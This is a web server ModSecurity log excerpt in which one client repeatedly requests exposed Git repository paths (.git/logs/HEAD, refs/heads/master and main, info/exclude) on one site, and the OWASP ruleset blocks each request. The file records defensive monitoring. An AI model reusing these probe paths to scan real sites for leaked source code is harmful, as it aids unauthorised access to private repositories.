[Mon May 11 11:49:03.338236 2026] [security2:error] [pid 1254212:tid 1254237] [client 185.177.72.9:7082] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/logs/HEAD"] [unique_id "agGmD0YQeUtAPynIs6xXUQAAABc"]
[Mon May 11 11:49:03.338624 2026] [security2:error] [pid 1254212:tid 1254237] [client 185.177.72.9:7082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/logs/HEAD"] [unique_id "agGmD0YQeUtAPynIs6xXUQAAABc"]
[Mon May 11 11:49:05.265724 2026] [security2:error] [pid 1254212:tid 1254237] [client 185.177.72.9:7082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmD0YQeUtAPynIs6xXUQAAABc"]
[Mon May 11 11:49:05.292973 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:7088] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/logs/refs/heads/master"] [unique_id "agGmEb4KNmD_mZ_vlf83_gAAAFg"]
[Mon May 11 11:49:05.293557 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:7088] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/logs/refs/heads/master"] [unique_id "agGmEb4KNmD_mZ_vlf83_gAAAFg"]
[Mon May 11 11:49:07.555161 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:7088] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmEb4KNmD_mZ_vlf83_gAAAFg"]
[Mon May 11 11:49:07.581209 2026] [security2:error] [pid 1254212:tid 1254216] [client 185.177.72.9:7102] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/logs/refs/heads/master"] [unique_id "agGmE0YQeUtAPynIs6xXVAAAAAI"]
[Mon May 11 11:49:07.581434 2026] [security2:error] [pid 1254212:tid 1254216] [client 185.177.72.9:7102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/logs/refs/heads/master"] [unique_id "agGmE0YQeUtAPynIs6xXVAAAAAI"]
[Mon May 11 11:49:09.309757 2026] [security2:error] [pid 1254212:tid 1254216] [client 185.177.72.9:7102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmE0YQeUtAPynIs6xXVAAAAAI"]
[Mon May 11 11:49:09.434963 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:7112] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/logs/refs/heads/main"] [unique_id "agGmFUYQeUtAPynIs6xXVQAAABQ"]
[Mon May 11 11:49:09.435481 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:7112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/logs/refs/heads/main"] [unique_id "agGmFUYQeUtAPynIs6xXVQAAABQ"]
[Mon May 11 11:49:10.647644 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:7112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmFUYQeUtAPynIs6xXVQAAABQ"]
[Mon May 11 11:49:10.675070 2026] [security2:error] [pid 1254179:tid 1254198] [client 185.177.72.9:7128] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/logs/refs/heads/main"] [unique_id "agGmFmS6k_SCYd1AVZqtKQAAARE"]
[Mon May 11 11:49:10.675635 2026] [security2:error] [pid 1254179:tid 1254198] [client 185.177.72.9:7128] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/logs/refs/heads/main"] [unique_id "agGmFmS6k_SCYd1AVZqtKQAAARE"]
[Mon May 11 11:49:11.911499 2026] [security2:error] [pid 1254179:tid 1254198] [client 185.177.72.9:7128] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmFmS6k_SCYd1AVZqtKQAAARE"]
[Mon May 11 11:49:11.944497 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:7134] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/info/exclude"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/info/exclude"] [unique_id "agGmF0YQeUtAPynIs6xXVgAAAAU"]
[Mon May 11 11:49:11.945882 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:7134] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/info/exclude"] [unique_id "agGmF0YQeUtAPynIs6xXVgAAAAU"]
[Mon May 11 11:49:13.168997 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:7134] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmF0YQeUtAPynIs6xXVgAAAAU"]
[Mon May 11 11:49:13.202828 2026] [security2:error] [pid 1254179:tid 1254202] [client 185.177.72.9:1946] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/info/exclude"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/info/exclude"] [unique_id "agGmGWS6k_SCYd1AVZqtKgAAARU"]
[Mon May 11 11:49:13.203284 2026] [security2:error] [pid 1254179:tid 1254202] [client 185.177.72.9:1946] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/info/exclude"] [unique_id "agGmGWS6k_SCYd1AVZqtKgAAARU"]
[Mon May 11 11:49:14.508569 2026] [security2:error] [pid 1254179:tid 1254202] [client 185.177.72.9:1946] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmGWS6k_SCYd1AVZqtKgAAARU"]
[Mon May 11 11:49:14.549851 2026] [security2:error] [pid 1254242:tid 1254258] [client 185.177.72.9:1958] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/refs/heads/master"] [unique_id "agGmGr4KNmD_mZ_vlf84AwAAAE0"]
[Mon May 11 11:49:14.550303 2026] [security2:error] [pid 1254242:tid 1254258] [client 185.177.72.9:1958] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/refs/heads/master"] [unique_id "agGmGr4KNmD_mZ_vlf84AwAAAE0"]
[Mon May 11 11:49:15.750050 2026] [security2:error] [pid 1254242:tid 1254258] [client 185.177.72.9:1958] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmGr4KNmD_mZ_vlf84AwAAAE0"]
[Mon May 11 11:49:15.782794 2026] [security2:error] [pid 1254328:tid 1254348] [client 185.177.72.9:1970] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/refs/heads/master"] [unique_id "agGmG0Rdw2n9wv6Ai48HkQAAAJI"]
[Mon May 11 11:49:15.783600 2026] [security2:error] [pid 1254328:tid 1254348] [client 185.177.72.9:1970] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/refs/heads/master"] [unique_id "agGmG0Rdw2n9wv6Ai48HkQAAAJI"]
[Mon May 11 11:49:17.067649 2026] [security2:error] [pid 1254328:tid 1254348] [client 185.177.72.9:1970] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmG0Rdw2n9wv6Ai48HkQAAAJI"]
[Mon May 11 11:49:17.092619 2026] [security2:error] [pid 1254133:tid 1254156] [client 185.177.72.9:1984] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/refs/heads/main"] [unique_id "agGmHRjZymfuKpjWXeh7JgAAANQ"]
[Mon May 11 11:49:17.093084 2026] [security2:error] [pid 1254133:tid 1254156] [client 185.177.72.9:1984] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/refs/heads/main"] [unique_id "agGmHRjZymfuKpjWXeh7JgAAANQ"]
[Mon May 11 11:49:18.265985 2026] [security2:error] [pid 1254133:tid 1254156] [client 185.177.72.9:1984] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmHRjZymfuKpjWXeh7JgAAANQ"]
[Mon May 11 11:49:18.298213 2026] [security2:error] [pid 1254328:tid 1254342] [client 185.177.72.9:1988] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/refs/heads/main"] [unique_id "agGmHkRdw2n9wv6Ai48HmQAAAIs"]
[Mon May 11 11:49:18.298709 2026] [security2:error] [pid 1254328:tid 1254342] [client 185.177.72.9:1988] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/refs/heads/main"] [unique_id "agGmHkRdw2n9wv6Ai48HmQAAAIs"]
[Mon May 11 11:49:19.533145 2026] [security2:error] [pid 1254328:tid 1254342] [client 185.177.72.9:1988] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmHkRdw2n9wv6Ai48HmQAAAIs"]
[Mon May 11 11:49:19.566276 2026] [security2:error] [pid 1256241:tid 1256250] [client 185.177.72.9:1990] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/remotes/origin/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/refs/remotes/origin/HEAD"] [unique_id "agGmH5kIEwRJMyDaV55N1gAAAUQ"]
[Mon May 11 11:49:19.566750 2026] [security2:error] [pid 1256241:tid 1256250] [client 185.177.72.9:1990] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/refs/remotes/origin/HEAD"] [unique_id "agGmH5kIEwRJMyDaV55N1gAAAUQ"]
[Mon May 11 11:49:20.739073 2026] [security2:error] [pid 1256241:tid 1256250] [client 185.177.72.9:1990] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmH5kIEwRJMyDaV55N1gAAAUQ"]
[Mon May 11 11:49:20.767782 2026] [security2:error] [pid 1254328:tid 1254352] [client 185.177.72.9:2000] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/remotes/origin/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/refs/remotes/origin/HEAD"] [unique_id "agGmIERdw2n9wv6Ai48HnAAAAJc"]
[Mon May 11 11:49:20.768325 2026] [security2:error] [pid 1254328:tid 1254352] [client 185.177.72.9:2000] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/refs/remotes/origin/HEAD"] [unique_id "agGmIERdw2n9wv6Ai48HnAAAAJc"]
[Mon May 11 11:49:22.014150 2026] [security2:error] [pid 1254328:tid 1254352] [client 185.177.72.9:2000] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmIERdw2n9wv6Ai48HnAAAAJc"]
